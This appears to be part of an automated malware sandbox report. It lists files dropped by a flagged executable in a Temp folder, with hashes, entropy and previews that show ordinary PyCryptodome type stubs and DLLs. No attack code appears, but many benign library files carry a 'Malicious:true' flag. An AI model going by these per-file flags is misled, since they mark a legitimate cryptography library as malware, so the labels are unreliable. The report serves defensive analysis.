                                                                                                                                            MD5:00C57D206A1CD7FC853656AF026AEC7E
                                                                                                                                            SHA1:0C3FDC977E7AE71D989B208A61DB93C66601177E
                                                                                                                                            SHA-256:C8A26AFF672F06B9C4D80286E0EF8DDE8B2B41FF4C317AB75ACA0FD0D01C751E
                                                                                                                                            SHA-512:74ECC9628812D52785545D3C5304AD5735C8D6C484C389B46F5D61AFCB339F136931C9A7A7759A6656028277B16ED6C21475F2E741B466516A9CA95BA5F61773
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Callable....RandFunc = Callable[[int],int]....class IntegerBase:.... def __init__(self, value: Union[IntegerBase, int]): ....... def __int__(self) -> int: ..... def __str__(self) -> str: ..... def __repr__(self) -> str: ..... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ..... @staticmethod.. def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ..... def __eq__(self, term: object) -> bool: ..... def __ne__(self, term: object) -> bool: ..... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __le__(self, term: Union[IntegerBase, int]) -> bool: ..... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ..... def __nonzero__(self) -> bool: ..... def is_negative(self) -> bool: ..... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ..... def __su
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143
                                                                                                                                            Entropy (8bit):4.509027321360697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBFovSL67L3XBVHa3VCfoovjeQACyWOAXUhvvn:1REYBFovSLwXBbfoyjlAqOAENv
                                                                                                                                            MD5:454B6FB1C6C3822CE064ED36C4C54D6E
                                                                                                                                            SHA1:3FCBB34C384AFEA58ECB58831F98A6AC2F22AAF9
                                                                                                                                            SHA-256:BAF20195FDB64EFAB526FE676151CE94716DCE7EF897EDFBF92BC744E53AECFD
                                                                                                                                            SHA-512:3505C80ED654D06FFBBA906455826D23CBC1C31798104762B0C116761037332E8197ED12E3ED92101E35A8F7CFCEF53BE887C80A0AF0B36BFFCC482B95F60750
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....from ._IntegerNative import IntegerNative...._raw_montgomery = Any....class IntegerCustom(IntegerNative):.. pass..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):81
                                                                                                                                            Entropy (8bit):4.306529623636421
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                            MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                            SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                            SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                            SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84
                                                                                                                                            Entropy (8bit):4.2558290658438995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                            MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                            SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                            SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                            SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35840
                                                                                                                                            Entropy (8bit):5.928082706906375
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                                                                                                            MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                            SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                            SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                            SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482
                                                                                                                                            Entropy (8bit):5.105314197006538
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB9mNRE1BgS+1dwCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1R+169gvC/gyfyv
                                                                                                                                            MD5:69A7EFD78AFDEF04820558CECC146AE6
                                                                                                                                            SHA1:3CF02E290E2C748FEB0AA29B55FB9C8BE7421E81
                                                                                                                                            SHA-256:FC079D87295B952D7A52929D205ED7BBED1EE2741479E96337FA7EBC9428A26A
                                                                                                                                            SHA-512:8F1CD56424FC12C86AA16ED0DBC076E2D0FA7714CE93F4D9B1C109BB661285563E4AA2918C48A2DC076B945ED2207197F53683946E29C78F1B9F32E668E54F03
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Crypto.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):30052
                                                                                                                                            Entropy (8bit):5.514468660237484
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:Wz6ez57dXVIx6d1bOs/lzDRzT1OzxQHJ56zEA7:WXBtRbOMzt1ExQJO
                                                                                                                                            MD5:58650811FE598F282228A5EB94DC02EC
                                                                                                                                            SHA1:94AD1AE98F6FF52427ED7B0DAD1BD18A5A166B3B
                                                                                                                                            SHA-256:FA7F603E3F9AE8B70629BFDE1FE7ECCB95661A6D1EEFBCD3C3DD1D1FE66F0A59
                                                                                                                                            SHA-512:90C3CA3B4DF4A4961EE1CA1E8D53B6C8BFA477A9C78870E9F07A6FD9FBE1994CD0713CB2B133B7962DCADDDD3823358D061E9FF878154C10170E07C0CDE08E37
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.Y........................:.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z ..e.d.d...............Z!d.d...Z"d.d...Z#..G.d...d.e$..............Z%d.d...Z&d d...Z'd...Z(d...Z)d...Z*d!d...Z+d...Z,d"d...Z-d.S.)#.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2038
                                                                                                                                            Entropy (8bit):4.91503915615325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                            MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                            SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                            SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
                                                                                                                                            SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):820
                                                                                                                                            Entropy (8bit):4.725635475246741
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                            MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                            SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                            SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                            SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):264
                                                                                                                                            Entropy (8bit):5.24201386772276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:/OBQl+KY+ZFZ6+nq95/n23d6p9ArM7BLQIaCkkrVXyit:2Bw+WZX6+nc/2Iph1dankrty2
                                                                                                                                            MD5:EFB2544AAC08D468087C1F6143CA69AF
                                                                                                                                            SHA1:4AA4AFBFAB7B3E00A3808941A797B819E70B0E68
                                                                                                                                            SHA-256:8E1194421D5980B8E70C73FF965E1951EBE1857EB1146B55F143E8EF2D0D9AB5
                                                                                                                                            SHA-512:909AC8EF53915EA36175AF0DA6F749CA372BB3D04378FF1F322C3CFB3CF4F843B8F0685458B5940DF3A949398671C5CFDD4188EEBE1609CF638D4B161503DE08
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e1...............................g.d...Z.d.S.).)...KDF..SecretSharing..DHN)...__all__........lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Protocol\__init__.py..<module>r........s..........>..)..(..(......r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44
                                                                                                                                            Entropy (8bit):4.516027641266231
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                            MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                            SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                            SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                            SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.799063285091512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                            MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                            SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                            SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                            SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1412
                                                                                                                                            Entropy (8bit):4.9317569017679235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                            MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                            SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                            SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                            SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3368
                                                                                                                                            Entropy (8bit):4.623430359144985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PjOqA+h7+/O1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAow58Kk1VZFGK0SOrTQASxCs
                                                                                                                                            MD5:D6B0C334F2E86B944B8B5C595D46091B
                                                                                                                                            SHA1:6D774B4906613E8AEDE7889D06E5F57C3BA51DE5
                                                                                                                                            SHA-256:11E9396C412E693B5A7D2B9A455BF7596853BE94BC0FCE01F292C1732934CBA3
                                                                                                                                            SHA-512:A58B1231C7EEBBEC0AFE7192A59204912A88D5E3F51A0356811DCBC11158A11E5D4FF617B4682817D8BE56C88FDA27BBAB95850C77C876336A2DE25927F129EB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... def size_
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):692
                                                                                                                                            Entropy (8bit):4.899620335781504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                            MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                            SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                            SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                            SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):4.5725118156821445
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, other: obj
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):754688
                                                                                                                                            Entropy (8bit):7.624959985050181
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27648
                                                                                                                                            Entropy (8bit):5.792654050660321
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67072
                                                                                                                                            Entropy (8bit):6.060461288575063
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):331
                                                                                                                                            Entropy (8bit):4.758113161274864
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10752
                                                                                                                                            Entropy (8bit):4.488437566846231
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1563
                                                                                                                                            Entropy (8bit):4.912137517765064
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eJ.........................F.....d.d.g.Z.d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc.....................&.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.S.)..._UrandomRNGc..................... .....t...........|...............S.).z0Return a random byte string of the desired size.r....)...self..ns.... .jC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Random\__init__.py..readz._UrandomRNG.read....s..........q.z.z........c...........................d.S...z0Method provided for backward compatibility only.N....r....s.... r......flushz._UrandomRNG.flush!...............r....c...........................d.S.r....r....r....s.... r......reinitz._UrandomRNG.reinit%...r....r....c...........................d.S.r....r....r....s.... r......closez._UrandomRNG.close)...r....r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........sP...................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):386
                                                                                                                                            Entropy (8bit):4.828244249619416
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):854
                                                                                                                                            Entropy (8bit):4.891350639959851
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1121
                                                                                                                                            Entropy (8bit):4.992804063334473
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Crypto.PublicKey.DSA import DsaKey..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[str]='bin
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):895
                                                                                                                                            Entropy (8bit):5.021175970297132
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
